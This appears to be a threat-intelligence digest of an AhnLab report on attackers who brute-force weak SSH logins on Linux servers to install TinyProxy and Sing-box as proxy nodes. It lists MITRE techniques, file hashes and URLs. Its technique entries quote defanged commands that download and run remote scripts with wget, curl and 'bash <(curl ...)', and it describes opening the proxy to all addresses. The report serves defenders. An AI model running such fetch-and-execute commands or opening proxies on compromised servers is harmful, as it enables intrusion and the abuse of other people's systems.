Threat Research

Analysis of Attacks Targeting Linux SSH Servers for Proxy Installation

Ahnlab
Analysis of Attacks Targeting Linux SSH Servers for Proxy Installation

Attackers are compromising poorly managed Linux servers by installing proxy tools TinyProxy and Sing-box using brute-force SSH access with weak credentials. These proxies enable attackers to misuse infected systems as proxy nodes for concealing harmful activities or generating profit. #TinyProxy #SingBox #LinuxServerAttacks

Keypoints

  • Linux servers with weak SSH credentials are targeted for brute-force login to install proxy services.
  • Attackers deploy TinyProxy by downloading and executing a Bash script that installs and configures it for unrestricted external access.
  • The TinyProxy configuration is altered to allow connections from any IP, exposing port 8888 for proxy exploitation.
  • Sing-box, an open-source multiprotocol proxy tool, is installed through a series of commands fetched from GitHub repositories.
  • Sing-box supports multiple bypass protocols such as vmess-argo and vless-reality, enabling circumvention of service blocks.
  • Attackers use legitimate tools instead of traditional proxy malware to covertly leverage compromised systems as proxy nodes.
  • System administrators are advised to use strong passwords, apply updates, deploy firewalls, and maintain up-to-date security software to prevent such intrusions.

MITRE Techniques

  • [T1110] Brute Force – Attackers targeted weak SSH credentials for unauthorized login to Linux servers. (‘Attackers are targeting SSH service that uses weak credentials’)
  • [T1105] Ingress Tool Transfer – Downloading and execution of malicious Bash script using wget or curl to install TinyProxy. (‘wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh’)
  • [T1543] Create or Modify System Process – Modifying TinyProxy configuration to enable external access and maintain persistence. (‘delete the access control rules… and add “Allow 0.0.0.0/0″‘)
  • [T1059] Command and Scripting Interpreter – Use of bash scripts fetched from GitHub for installing Sing-box proxy tool. (‘bash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh)’)

Indicators of Compromise

  • [File Hash] Malicious Bash script hashes associated with TinyProxy installation – 16d1dfa35d64046128290393512171ce, 35d79027834a3b6270455f59b54f2e19
  • [URL] Download locations for malicious scripts – hxxps://0x0[.]st/8VDs.sh, hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh

Read more: https://asec.ahnlab.com/en/88749/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint